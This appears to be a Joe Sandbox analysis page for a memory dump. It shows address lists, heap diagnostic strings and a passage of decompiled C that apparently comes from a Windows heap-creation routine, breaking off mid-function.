0x00000000
0x00000000
0x04cc81a5
0x00000000
0x04cc81a5
0x04cc7f2c
0x04cc7f32
0x00000000
0x04cc7f32
0x04cc81c9
0x04cc81c9
0x04cc81d0
0x04cc81d0
0x04cc81d2
0x00000000
0x00000000
0x04cc81d4
0x04cc81d8
0x04cc81f3
0x04cc81da
0x04cc81da
0x04cc81dd
0x04cc81e3
0x04cc81e6
0x04cc81e8
0x04cc81eb
0x04cc81eb
0x04cc81e6
0x04cc81f7
0x04cc8201
0x04cc8203
0x04cc8205
0x04cc8207
0x00000000
0x04cc8207
0x00000000
0x04cc8203
0x04cc820f
0x04cc820f
0x04cc8212
0x04cc8215
0x04cc8217
0x04cc8219
0x04cc822d
0x04cc8232
0x04cc821b
0x04cc821b
0x04cc821d
0x04cc8220
0x04cc8222
0x04cc8222
0x04cc823a
0x04cc823d
0x04cc8243
0x04cc8246
0x04cc8248
0x04cc824e
0x04cc8251
0x04cc8254
0x04cc8254
0x04cc8257
0x04cc8259
0x00000000
0x00000000
0x04cc8265
0x04cc8267
0x04cc8269
0x04cc834d
0x04cc834f
0x00000000
0x04cc826f
0x04cc826f
0x04cc8272
0x04cc8272
0x04cc8278
0x04cc827a
0x04cc827d
0x04cc8280
0x04cc8284
0x04cc8287
0x04cc8289
0x04cc8289
0x04cc828b
0x04cc8291
0x04cc829d
0x04cc82a4
0x04cc82a6
0x04cc82a9
0x04cc82ab
0x04cc82ab
0x04cc82ab
0x04cc82ab
0x04cc82ae
0x04cc82b1
0x04cc82b3
0x04cc8319
0x04cc831c
0x04cc8322
0x04cc82b5
0x04cc82b5
0x04cc82b8
0x04cc82bb
0x04cc82bd
0x04cc82c3
0x04cc82c7
0x04cc82c9
0x04cc82cc
0x04cc82cf
0x04cc82e8
0x04cc82ea
0x04cc82fc
0x04cc8301
0x04cc8301
0x04cc8304
0x04cc8304
0x04cc830d
0x04cc830f
0x04cc8315
0x04cc8317
0x00000000
0x00000000
0x04cc8317
0x04cc8325
0x04cc8329
0x04cc8345
0x04cc8345
0x00000000
0x04cc8329
0x04cc825b
0x04cc8261
0x00000000
0x04cc8261
0x04cc8248
0x00000000
0x04cc7c5c
0x04cc7c5c
0x04cc7c5f
0x04cc7c62
0x04cc7c65
0x04cc7c68
0x04cc7e20
0x04cc7e24
0x04cc7c6e
0x04cc7c6e
0x04cc7c6e
0x00000000
0x04cc7c68
0x04cc7c56
0x04cc7bf8
0x04cc7c06
0x04cc7c06
0x04cc74ce
0x04cc74d2
0x04cc74d7
0x04cc74d9
0x00000000
0x04cc74db
0x04cc74e5
0x04cc7556
0x04cc7556
0x04cc7560
0x04cc756a
0x04cc7571
0x04cc7581
0x04cc7581
0x04cc74d9
0x04cc74cc
0x04cc7386
0x04cc737e
0x04cc733d
0x04cc7333
0x04cc7167
0x04cc716d
0x04cc7174
0x04cc71d3
0x04cc71d3
0x04cc71d3
0x04cc71d9
0x04cc71d9
0x04cc71dd
0x04cc71e1
0x04cc71e8
0x04cc71ea
0x04cc71ec
0x04cc71ec
0x04cc71f1
0x00000000
0x04cc7176
0x04cc7176
0x04cc717c
0x04cc71b0
0x04cc71c0
0x04cc71ca
0x04cc71cc
0x00000000
0x04cc717e
0x04cc717e
0x04cc7187
0x04cc7191
0x04cc7198
0x04cc71a8
0x04cc71a8
0x04cc717c
0x04cc7174
0x04cc8c4a
0x04cc8c4a
0x04cc8c51
0x04cc8c5d
0x04cc8c97
0x04cc8c5f
0x04cc8c68
0x04cc8c68
0x04cc8c9f
0x04cc8ca7
0x04cc8cac
0x04cc8cbb
0x04cc8cbb
0x04cc8cac
0x04cc8cc6
0x04cc8cd4
0x04cc8cd4
0x00000000

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 04CC7BB6, 04CC85B6
HEAP: , xrefs: 04CC7B9C, 04CC859F
HEAP[%wZ]: , xrefs: 04CC7B8D, 04CC8590

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 0f586e69e0549c126410ddc1b67723999a1830843ddcf293d5599c09260defe0
Instruction ID: 8db5b58da48f6224b2a1b7b5ecaa76b7661486139d3446e22fc850358209497e
Opcode Fuzzy Hash: 0f586e69e0549c126410ddc1b67723999a1830843ddcf293d5599c09260defe0
Instruction Fuzzy Hash: 09138D70A01656DFDB25DF69C4907AABBB2FF48304F1881ADD849AB381D734B945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CC0F90 Relevance: 5.9, Strings: 4, Instructions: 940
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04CC0F90(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t415;
				signed int _t419;
				void* _t420;
				void* _t424;
				void* _t427;
				void _t435;
				signed int _t438;
				intOrPtr _t440;
				void* _t442;
				void* _t443;
				signed int _t444;
				void* _t447;
				unsigned int _t453;
				intOrPtr* _t473;
				intOrPtr* _t475;
				intOrPtr* _t477;
				intOrPtr* _t479;
				void* _t505;
				void* _t507;
				signed int _t513;
				void* _t519;
				void* _t522;
				intOrPtr _t523;
				void* _t524;
				void* _t527;
				char* _t534;
				intOrPtr _t545;
				intOrPtr _t554;
				void* _t557;
				void* _t558;
				signed int _t559;
				void* _t562;
				signed int _t564;
				void* _t565;
				signed int _t570;
				signed int _t571;
				intOrPtr _t592;
				void* _t601;
				signed int _t602;
				void* _t605;
				unsigned int _t613;
				void* _t616;
				void* _t620;
				signed int _t626;
				intOrPtr _t627;
				void* _t630;
				void* _t631;
				signed int _t641;
				intOrPtr _t643;
				signed int _t658;
				void* _t666;
				signed int _t671;
				signed int _t672;
				signed int _t682;
				void* _t686;
				signed int _t691;
				signed char _t692;
				signed int _t693;
				void* _t701;
				void* _t702;
				signed char _t703;
				void* _t718;
				void* _t719;
				void* _t721;
				short _t723;
				void* _t724;
				signed int _t726;
				signed int _t727;
				void* _t741;
				void* _t742;
				intOrPtr* _t745;
				void* _t746;
				signed int _t747;
				signed int _t748;
				void* _t750;
				intOrPtr* _t758;
				void* _t759;
				void* _t761;
				void* _t764;
				intOrPtr _t768;
				void* _t769;
				void* _t774;

				_push(0x11c);
				_push(0x4d8c130);
				E04D07C40(__ebx, __edi, __esi);
				_t613 =  *(_t759 + 0x18);
				 *(_t759 - 0xb4) = _t613;
				_t691 =  *(_t759 + 8);
				 *(_t759 - 0xb0) = _t691;
				_t415 =  *(_t759 + 0xc);
				 *(_t759 - 0xb8) = _t415;
				 *(_t759 - 0xf4) = _t415;
				_t616 =  *(_t759 + 0x10);
				 *(_t759 - 0xc8) = _t616;
				_t741 =  *(_t759 + 0x14);
				 *(_t759 - 0xc0) = _t741;
				 *(_t759 - 0xe8) = _t613;
				_t718 =  *(_t759 + 0x1c);
				 *(_t759 - 0xd4) =  *( *[fs:0x30] + 0x68);
				 *(_t759 - 0xe4) = 0;
				 *(_t759 - 0xac) = 0;
				 *(_t759 - 0xd0) = 0;
				_t768 =  *0x4da373c; // 0x0
				if(_t768 != 0) {
					__eflags =  *(_t759 - 0xb8);
					if( *(_t759 - 0xb8) != 0) {
						goto L1;
					}
					__eflags =  *(_t759 - 0xb4);
					if( *(_t759 - 0xb4) != 0) {
						goto L1;
					}
					_t758 =  *0x4da3754; // 0x0
					 *0x4da91e0(_t691, 0, _t616, _t741, 0, _t718);
					 *_t758();
					_t742 = 0;
					__eflags = 0;
					if(0 != 0) {
						L82:
						_t719 =  *(_t759 - 0xb8);
						L83:
						_t693 =  *(_t759 - 0xb4);
						L84:
						_t419 =  *(_t759 - 0xd0);
						if(_t419 != 0) {
							__eflags = _t419 - _t693;
							if(_t419 != _t693) {
								E04CAFBD0(0, _t719, _t742, _t419);
							}
						}
						if( *(_t759 - 0xac) != 0) {
							__eflags = _t719;
							if(_t719 == 0) {
								 *(_t759 - 0xbc) = 0;
								E04CAFABA(_t759 - 0xac, _t759 - 0xbc, 0x8000);
							}
						}
						_t420 = _t742;
						L87:
						 *[fs:0x0] =  *((intOrPtr*)(_t759 - 0x10));
						return _t420;
					}
					__eflags = _t718 - 0xffffffff;
					if(_t718 != 0xffffffff) {
						L117:
						_t719 =  *(_t759 - 0xb8);
						L110:
						_t742 = 0;
						goto L83;
					}
					_t718 = 0;
					_t691 =  *(_t759 - 0xb0);
					_t616 =  *(_t759 - 0xc8);
					L2:
					_t692 = _t691 & 0xf1ffffff;
					 *(_t759 - 0xb0) = _t692;
					_t742 = 0;
					if((_t692 & 0x00000100) != 0) {
						__eflags = _t692 & 0x00000002;
						if((_t692 & 0x00000002) == 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xb8);
						if( *(_t759 - 0xb8) != 0) {
							goto L82;
						}
						__eflags = _t616;
						if(_t616 != 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xc0);
						if( *(_t759 - 0xc0) != 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xb4);
						if( *(_t759 - 0xb4) != 0) {
							goto L82;
						}
						__eflags = _t718 - 0xffffffff;
						if(_t718 == 0xffffffff) {
							_t602 =  *0x4da3744; // 0x0
							asm("sbb eax, eax");
							_t718 = _t718 &  !( ~_t602);
							__eflags = _t718;
						}
						__eflags = _t718;
						if(_t718 == 0) {
							_t742 = _t759 - 0x4c;
							goto L4;
						} else {
							_t742 = _t718;
							_t601 = E04D70A68(_t718);
							__eflags = _t601;
							if(_t601 == 0) {
								goto L117;
							}
							_t692 =  *(_t759 - 0xb0);
							L4:
							_t424 = 2;
							L5:
							if(_t742 != 0) {
								__eflags = _t742 - _t759 - 0x4c;
								if(_t742 == _t759 - 0x4c) {
									_t723 = 0x30;
									E04CF8F40(_t742, 0, _t723);
									_t435 = 2;
									 *_t742 = _t435;
									 *((short*)(_t742 + 2)) = _t723;
									 *((intOrPtr*)(_t742 + 0xc)) = 1;
									_t314 = _t742 + 0x10;
									 *_t314 =  *(_t742 + 0x10) | 0xffffffff;
									__eflags =  *_t314;
								}
								__eflags =  *(_t742 + 4) & 0x00000001;
								if(( *(_t742 + 4) & 0x00000001) == 0) {
									_t620 = E04D70A21(_t742);
									_t721 =  *(_t759 - 0xc8);
									_t427 =  *(_t759 - 0xc0);
									__eflags = _t721;
									if(_t721 == 0) {
										_t721 = _t427;
									}
									__eflags = _t427 - _t721;
									if(_t427 > _t721) {
										_t427 = _t721;
									}
									_t742 = E04D78BBE(E04D5D85E(_t427,  *(_t759 - 0xb0),  *(_t759 - 0xd4)), _t721, _t427, _t620, _t692);
									__eflags = _t742;
									if(_t742 != 0) {
										E04CA918A(_t742, 0, 1, 0);
										__eflags =  *(_t742 + 0x14);
										if( *(_t742 + 0x14) == 0) {
											E04D78E26(_t742);
											_t742 = 0;
										}
									}
									goto L82;
								} else {
									__eflags =  *0x4da3744; // 0x0
									if(__eflags == 0) {
										goto L117;
									}
									_t719 =  *(_t759 - 0xb8);
									_t745 =  *0x4da3754; // 0x0
									 *0x4da91e0( *(_t759 - 0xb0), _t719,  *(_t759 - 0xc8),  *(_t759 - 0xc0), 0, 0);
									_t742 =  *_t745();
									goto L83;
								}
							}
							if((_t692 & 0x10000000) != 0) {
								L9:
								_t746 = 0x30;
								E04CF8F40(_t759 - 0xa8, 0, _t746);
								_t764 = _t761 + 0xc;
								if(_t718 != 0) {
									 *((intOrPtr*)(_t759 - 4)) = 0;
									__eflags =  *_t718 - _t746;
									if( *_t718 == _t746) {
										_t682 = 0xc;
										memcpy(_t759 - 0xa8, _t718, _t682 << 2);
										_t764 = _t764 + 0xc;
									}
									 *((intOrPtr*)(_t759 - 4)) = 0xfffffffe;
								}
								_t626 =  *(_t759 - 0xd4);
								_t438 =  *(_t759 - 0xb0);
								if((_t626 & 0x00000010) != 0) {
									_t438 = _t438 | 0x00000020;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00000020) != 0) {
									_t438 = _t438 | 0x00000040;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00200000) != 0) {
									_t438 = _t438 | 0x00000080;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00000040) != 0) {
									_t438 = _t438 | 0x40000000;
									 *(_t759 - 0xb0) = _t438;
								}
								if((0x00000080 & _t626) != 0) {
									_t438 = _t438 | 0x20000000;
									 *(_t759 - 0xb0) = _t438;
								}
								_t699 = 0x1000;
								if((0x00001000 & _t626) != 0) {
									 *(_t759 - 0xb0) = _t438 | 0x08000000;
								}
								_t627 =  *[fs:0x30];
								if( *((intOrPtr*)(_t759 - 0xa4)) == 0) {
									 *((intOrPtr*)(_t759 - 0xa4)) =  *((intOrPtr*)(_t627 + 0x78));
								}
								if( *((intOrPtr*)(_t759 - 0xa0)) == 0) {
									 *((intOrPtr*)(_t759 - 0xa0)) =  *((intOrPtr*)(_t627 + 0x7c));
								}
								if( *(_t759 - 0x9c) == 0) {
									 *(_t759 - 0x9c) =  *(_t627 + 0x84);
								}
								if( *(_t759 - 0x98) == 0) {
									 *(_t759 - 0x98) =  *(_t627 + 0x80);
								}
								_t440 =  *0x4da693c; // 0x7ffeffff
								if(_t440 == 0) {
									 *0x4da6940 = 0x10000;
									_push(0);
									_push(0x2c);
									_push(_t759 - 0x78);
									_push(0);
									_t442 = E04CF2D10();
									__eflags = _t442;
									if(_t442 < 0) {
										goto L117;
									}
									_t440 =  *((intOrPtr*)(_t759 - 0x58));
									 *0x4da693c = _t440;
									_t699 = 0x1000;
								}
								if( *((intOrPtr*)(_t759 - 0x94)) == 0) {
									 *((intOrPtr*)(_t759 - 0x94)) = _t440 -  *0x4da6940 - _t699;
								}
								if( *((intOrPtr*)(_t759 - 0x90)) != 0) {
									__eflags =  *((intOrPtr*)(_t759 - 0x90)) - 0x7f000;
									if( *((intOrPtr*)(_t759 - 0x90)) <= 0x7f000) {
										L29:
										_t443 =  *(_t759 - 0xc0);
										if(_t443 != 0) {
											_t699 = _t443 + 0x00000fff & 0xfffff000;
										}
										 *(_t759 - 0xc4) = _t699;
										_t724 =  *(_t759 - 0xc8);
										if(_t724 != 0) {
											_t629 = _t724 + 0x00000fff & 0xfffff000;
										} else {
											_t62 = _t699 + 0xffff; // 0x10fff
											_t629 = _t62 & 0xffff0000;
										}
										 *(_t759 - 0xbc) = _t629;
										_t747 = _t699;
										if(_t699 > _t629) {
											_t699 = _t629;
											 *(_t759 - 0xc4) = _t629;
											_t747 = _t629;
										}
										_t444 =  *(_t759 - 0xb0);
										_t719 =  *(_t759 - 0xb8);
										if((_t444 & 0x00000002) == 0 || _t719 != 0) {
											 *(_t759 - 0xd4) = 0;
										} else {
											 *(_t759 - 0xd4) = 0x1000;
											 *(_t759 - 0xe4) = 2;
											_t70 = _t629 - 0x1000; // 0xffff
											_t444 =  *(_t759 - 0xb0);
											if(_t70 < _t747) {
												_t629 = _t629 + 0x00010fff & 0xffff0000;
												 *(_t759 - 0xbc) = _t629;
											}
										}
										if(_t747 == 0 || _t629 == 0) {
											goto L110;
										} else {
											if((_t444 & 0x61000000) != 0) {
												__eflags = _t444 & 0x10000000;
												if((_t444 & 0x10000000) != 0) {
													goto L39;
												}
												_t420 = E04D5F51B(_t444, _t719, _t629, _t699,  *(_t759 - 0xb4), _t759 - 0xa8);
												goto L87;
											}
											L39:
											 *(_t759 - 0xc8) = 0x258;
											_t693 =  *(_t759 - 0xb4);
											if((_t444 & 0x00000001) != 0) {
												__eflags = _t693;
												if(_t693 == 0) {
													L42:
													if(_t719 != 0) {
														__eflags =  *(_t759 - 0x84);
														if( *(_t759 - 0x84) != 0) {
															_t701 =  *(_t759 - 0x8c);
															__eflags = _t701;
															if(_t701 == 0) {
																goto L110;
															}
															_t630 =  *(_t759 - 0x88);
															__eflags = _t630;
															if(_t630 == 0) {
																goto L110;
															}
															__eflags = _t701 - _t630;
															if(_t701 > _t630) {
																goto L110;
															}
															__eflags = _t444 & 0x00000002;
															if((_t444 & 0x00000002) != 0) {
																goto L110;
															}
															 *(_t759 - 0xcc) = _t719;
															 *(_t759 - 0xc0) = _t719 + _t701;
															 *(_t759 - 0xbc) = _t630;
															E04CF8F40(_t719, 0, 0x1000);
															_t764 = _t764 + 0xc;
															L108:
															_t748 =  *(_t759 - 0xb0);
															L100:
															 *(_t759 - 0xe4) =  *(_t759 - 0xe4) | 0x00000001;
															_t702 = _t719;
															 *(_t759 - 0xac) = _t702;
															_t726 = _t748 & 0x00040000;
															_t631 =  *(_t759 - 0xc0);
															_t447 =  *(_t759 - 0xcc);
															L49:
															if(_t447 != _t631) {
																L55:
																_t727 = _t702 + 0x258;
																if(( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
																	 *( *(_t759 - 0xac) + 0xbc) = _t727 + 0x00000007 & 0xfffffff8;
																	 *(_t759 - 0xc8) =  *(_t759 - 0xc8) + 0x60c;
																	_t727 =  *( *(_t759 - 0xac) + 0xbc) + 0x60c;
																	 *(_t759 - 0xb0) =  *(_t759 - 0xb0) | 0x04000000;
																	_t748 =  *(_t759 - 0xb0);
																}
																_t453 =  *(_t759 - 0xc8) + 0x00000007 & 0xfffffff8;
																 *(_t759 - 0xe8) = _t453;
																 *( *(_t759 - 0xac)) = _t453 >> 3;
																 *((char*)( *(_t759 - 0xac) + 2)) = 1;
																 *((char*)( *(_t759 - 0xac) + 7)) = 1;
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x60)) = 0xeeffeeff;
																 *( *(_t759 - 0xac) + 0x40) = _t748 & 0xefffffff;
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x58)) = 0;
																E04CF8F40( *(_t759 - 0xac) + 0x1f4, 0, 0x5c);
																E04CB22E1( *(_t759 - 0xac));
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x234)) = 1;
																_t750 =  *(_t759 - 0xac);
																if(( *(_t750 + 0x40) & 0x08000000) != 0) {
																	 *(_t750 + 0x58) = E04D6D8FD(0x4d6fd00) & 0x0000ffff;
																	 *( *(_t759 - 0xac) + 0x40) =  *( *(_t759 - 0xac) + 0x40) & 0xffffffbf;
																	_t750 =  *(_t759 - 0xac);
																}
																_t703 =  *(_t759 - 0xb0);
																 *(_t750 + 0x44) = _t703 & 0x6001007d;
																 *((short*)( *(_t759 - 0xac) + 0x7e)) = _t727 -  *(_t759 - 0xac);
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x80)) = 0;
																_t473 =  *(_t759 - 0xac) + 0xc0;
																 *((intOrPtr*)(_t473 + 4)) = _t473;
																 *_t473 = _t473;
																_t475 =  *(_t759 - 0xac) + 0x9c;
																 *((intOrPtr*)(_t475 + 4)) = _t475;
																 *_t475 = _t475;
																_t477 =  *(_t759 - 0xac) + 0xa4;
																 *((intOrPtr*)(_t477 + 4)) = _t477;
																 *_t477 = _t477;
																_t479 =  *(_t759 - 0xac) + 0x8c;
																 *((intOrPtr*)(_t479 + 4)) = _t479;
																 *_t479 = _t479;
																_t641 =  *(_t759 - 0xd0);
																if(_t641 != 0 || (_t703 & 0x00000001) != 0) {
																	L61:
																	 *( *(_t759 - 0xac) + 0xc8) = _t641;
																	 *( *(_t759 - 0xac) + 0x48) =  *( *(_t759 - 0xac) + 0x48) | 0x80000000;
																	if(E04CE1EED( *(_t759 - 0xac),  *(_t759 - 0xac),  *(_t759 - 0xe8) + 0x238, _t641,  *(_t759 - 0xe4),  *(_t759 - 0xcc),  *(_t759 - 0xc0),  *(_t759 - 0xcc) -  *(_t759 - 0xd4) +  *(_t759 - 0xbc)) == 0) {
																		goto L117;
																	}
																	if( *(_t759 - 0xb8) != 0) {
																		E04CF8F40(_t727, 0, 0x80);
																	}
																	 *((intOrPtr*)(_t727 + 4)) = 0x80;
																	_t643 = _t727 + 0x24;
																	 *((intOrPtr*)(_t727 + 0x1c)) = _t643;
																	 *(_t727 + 0x18) =  *(_t759 - 0xac) + 0xc0;
																	 *((intOrPtr*)(_t727 + 0x20)) = _t643 + 0x10;
																	E04CB1A24( *(_t759 - 0xac), _t727);
																	 *((short*)( *(_t759 - 0xac) + 0x7c)) = 0;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x64)) =  *((intOrPtr*)(_t759 - 0xa4));
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x68)) =  *((intOrPtr*)(_t759 - 0xa0));
																	 *( *(_t759 - 0xac) + 0x6c) =  *(_t759 - 0x9c) >> 3;
																	 *( *(_t759 - 0xac) + 0x70) =  *(_t759 - 0x98) >> 3;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x78)) =  *((intOrPtr*)(_t759 - 0x94));
																	 *( *(_t759 - 0xac) + 0x5c) =  *((intOrPtr*)(_t759 - 0x90)) + 7 >> 3;
																	 *( *(_t759 - 0xac) + 0xcc) =  *(_t759 - 0x84) ^  *0x4da6d48;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x250)) = 4;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x254)) = 0xfe000;
																	if(( *0x4da6934 & 1) != 0) {
																		 *( *(_t759 - 0xac) + 0x48) = 1;
																	}
																	_t658 =  *(_t759 - 0xb0);
																	_t505 =  *(_t759 - 0xac);
																	if((_t658 & 0x00010000) != 0) {
																		 *((intOrPtr*)(_t505 + 0x94)) = 0x17;
																		 *((intOrPtr*)( *(_t759 - 0xac) + 0x98)) = 0xfffffff0;
																	} else {
																		 *((intOrPtr*)(_t505 + 0x94)) = 0xf;
																		 *((intOrPtr*)( *(_t759 - 0xac) + 0x98)) = 0xfffffff8;
																	}
																	_t507 =  *(_t759 - 0xac);
																	if(( *(_t507 + 0x40) & 0x00000020) != 0) {
																		 *((intOrPtr*)(_t507 + 0x94)) =  *((intOrPtr*)(_t507 + 0x94)) + 8;
																		_t507 =  *(_t759 - 0xac);
																	}
																	 *((intOrPtr*)(_t507 + 0xe4)) = 0;
																	 *((short*)( *(_t759 - 0xac) + 0xe8)) = 0;
																	 *((char*)( *(_t759 - 0xac) + 0xea)) = 0;
																	 *((char*)( *(_t759 - 0xac) + 0xeb)) = 0;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0xb8)) = 0;
																	_t513 = _t658 & 0x00000003;
																	_t659 = _t658 & 0xffffff00 | _t513 == 0x00000002;
																	if(((_t513 & 0xffffff00 | ( *0x4da6934 & 1) == 0x00000000) & (_t658 & 0xffffff00 | _t513 == 0x00000002)) == 0) {
																		L70:
																		E04CBFED0(0x4da4800);
																		E04CE666D( *(_t759 - 0xac));
																		_push(0x4da4800);
																		E04CBE740( *(_t759 - 0xac));
																		if( *((intOrPtr*)( *(_t759 - 0xac) + 0x7c)) == 0) {
																			goto L117;
																		}
																		_t519 = E04CC3C40();
																		_t753 = 0x7ffe0380;
																		if(_t519 != 0) {
																			_t522 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																		} else {
																			_t522 = 0x7ffe0380;
																		}
																		if( *_t522 != 0) {
																			_t523 =  *[fs:0x30];
																			__eflags =  *(_t523 + 0x240) & 0x00000001;
																			if(( *(_t523 + 0x240) & 0x00000001) == 0) {
																				goto L74;
																			}
																			__eflags = E04CC3C40();
																			if(__eflags != 0) {
																				_t753 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																				__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																			}
																			_t754 =  *(_t759 - 0xb0);
																			E04D6F0E5(0,  *(_t759 - 0xac),  *(_t759 - 0xb0), 0x4da4800, __eflags,  *(_t759 - 0xbc),  *(_t759 - 0xc4),  *_t753 & 0x000000ff);
																			goto L75;
																		} else {
																			L74:
																			_t754 =  *(_t759 - 0xb0);
																			L75:
																			_t524 = E04CC3C40();
																			_t731 = 0x7ffe038a;
																			if(_t524 != 0) {
																				_t527 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																			} else {
																				_t527 = 0x7ffe038a;
																			}
																			if( *_t527 != 0) {
																				__eflags = E04CC3C40();
																				if(__eflags != 0) {
																					_t731 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																					__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																				}
																				E04D6F0E5(0,  *(_t759 - 0xac), _t754, _t731, __eflags,  *(_t759 - 0xbc),  *(_t759 - 0xc4),  *_t731 & 0x000000ff);
																			}
																			if(E04CC3C40() != 0) {
																				_t534 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
																			} else {
																				_t534 = 0x7ffe0388;
																			}
																			if( *_t534 != 0) {
																				E04D6D947(0,  *(_t759 - 0xac),  *(_t759 - 0xbc), _t754);
																			}
																			 *( *(_t759 - 0xac) + 0x48) =  *( *(_t759 - 0xac) + 0x48) & 0x7fffffff;
																			 *((intOrPtr*)( *(_t759 - 0xac) + 0xd0)) = 0;
																			_t742 =  *(_t759 - 0xac);
																			 *(_t759 - 0xac) = 0;
																			 *(_t759 - 0xd0) = 0;
																			goto L82;
																		}
																	} else {
																		 *((intOrPtr*)( *(_t759 - 0xac) + 0xec)) = E04CC5D90(_t659,  *(_t759 - 0xac), 0x80000a, 0x100);
																		_t545 =  *((intOrPtr*)( *(_t759 - 0xac) + 0xec));
																		if(_t545 == 0) {
																			goto L117;
																		}
																		 *((char*)(_t545 - 1)) = 1;
																		 *((short*)( *(_t759 - 0xac) + 0xf0)) = 0x80;
																		goto L70;
																	}
																} else {
																	 *(_t759 - 0xd0) = _t727;
																	if(E04CDFBC0(_t727, 0, 0x10000000) < 0) {
																		 *(_t759 - 0xd0) = 0;
																		goto L117;
																	}
																	_t727 = _t727 + 0x18;
																	_t641 =  *(_t759 - 0xd0);
																	goto L61;
																}
															}
															asm("sbb edi, edi");
															_push(( ~_t726 & 0x0000003c) + 4);
															_push(0x1000);
															_push(_t759 - 0xc4);
															_push(0);
															_push(_t759 - 0xcc);
															_push(0xffffffff);
															if(E04CF2B10() < 0) {
																goto L117;
															}
															if(E04CC3C40() != 0) {
																_t666 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
															} else {
																_t666 = 0x7ffe0380;
															}
															if( *_t666 != 0) {
																_t554 =  *[fs:0x30];
																__eflags =  *(_t554 + 0x240) & 0x00000001;
																if(( *(_t554 + 0x240) & 0x00000001) != 0) {
																	E04D6EFD3(0,  *(_t759 - 0xac),  *(_t759 - 0xcc),  *(_t759 - 0xc4), 1);
																}
															}
															 *(_t759 - 0xc0) =  *(_t759 - 0xc0) +  *(_t759 - 0xc4);
															_t702 =  *(_t759 - 0xac);
															goto L55;
														}
														_push(0);
														_push(0x1c);
														_push(_t759 - 0x110);
														_push(0);
														_push(_t719);
														_push(0xffffffff);
														_t557 = E04CF2BE0();
														__eflags = _t557;
														if(_t557 < 0) {
															goto L110;
														}
														_t558 =  *(_t759 - 0x110);
														 *(_t759 - 0xc0) = _t558;
														__eflags = _t558 - _t719;
														if(_t558 != _t719) {
															goto L110;
														}
														__eflags =  *((intOrPtr*)(_t759 - 0x100)) - 0x10000;
														if( *((intOrPtr*)(_t759 - 0x100)) == 0x10000) {
															goto L110;
														}
														 *(_t759 - 0xcc) = _t558;
														__eflags =  *((intOrPtr*)(_t759 - 0x100)) - 0x1000;
														if( *((intOrPtr*)(_t759 - 0x100)) != 0x1000) {
															_t671 =  *(_t759 - 0x104);
															 *(_t759 - 0xbc) = _t671;
															_t559 =  *(_t759 - 0xc4);
															__eflags = _t559 - _t671;
															if(_t559 > _t671) {
																_t559 = _t671;
																 *(_t759 - 0xc4) = _t559;
															}
															__eflags = _t559 - 0x1000;
															if(_t559 < 0x1000) {
																goto L110;
															} else {
																goto L108;
															}
														}
														_t748 =  *(_t759 - 0xb0);
														__eflags = _t748 & 0x00040000;
														if((_t748 & 0x00040000) != 0) {
															__eflags =  *(_t759 - 0xfc) & 0x00000040;
															if(( *(_t759 - 0xfc) & 0x00000040) == 0) {
																goto L110;
															}
														}
														E04CF8F40(_t558, 0, 0x1000);
														_t764 = _t764 + 0xc;
														_push(0);
														_push(0x1c);
														_push(_t759 - 0x12c);
														_push(3);
														_push(_t719);
														_push(0xffffffff);
														_t562 = E04CF2BE0();
														__eflags = _t562;
														if(_t562 < 0) {
															goto L110;
														}
														 *(_t759 - 0xbc) =  *(_t759 - 0x120);
														_t564 =  *(_t759 - 0x104);
														 *(_t759 - 0xc4) = _t564;
														_t565 =  *(_t759 - 0xcc) + _t564;
														__eflags = _t565;
														 *(_t759 - 0xc0) = _t565;
														goto L100;
													}
													 *(_t759 - 0xdc) = 0;
													if( *(_t759 - 0x84) != _t719) {
														L172:
														_t742 = 0;
														goto L84;
													}
													 *(_t759 - 0xe8) = E04CB2330(_t629);
													_t570 = (E04CB2330(_t629) & 0x0000001f) << 0x10;
													 *(_t759 - 0xd8) = _t570;
													_t672 =  *(_t759 - 0xbc);
													_t571 = _t570 + _t672;
													 *(_t759 - 0xe0) = _t571;
													if(_t571 < _t672) {
														 *(_t759 - 0xe0) = _t672;
														 *(_t759 - 0xd8) = 0;
													}
													_t748 =  *(_t759 - 0xb0);
													_t726 = _t748 & 0x00040000;
													asm("sbb eax, eax");
													_push(( ~_t726 & 0x0000003c) + 4);
													_push(0x2000);
													_push(_t759 - 0xe0);
													_push(0);
													_push(_t759 - 0xdc);
													_push(0xffffffff);
													if(E04CF2B10() < 0) {
														goto L117;
													} else {
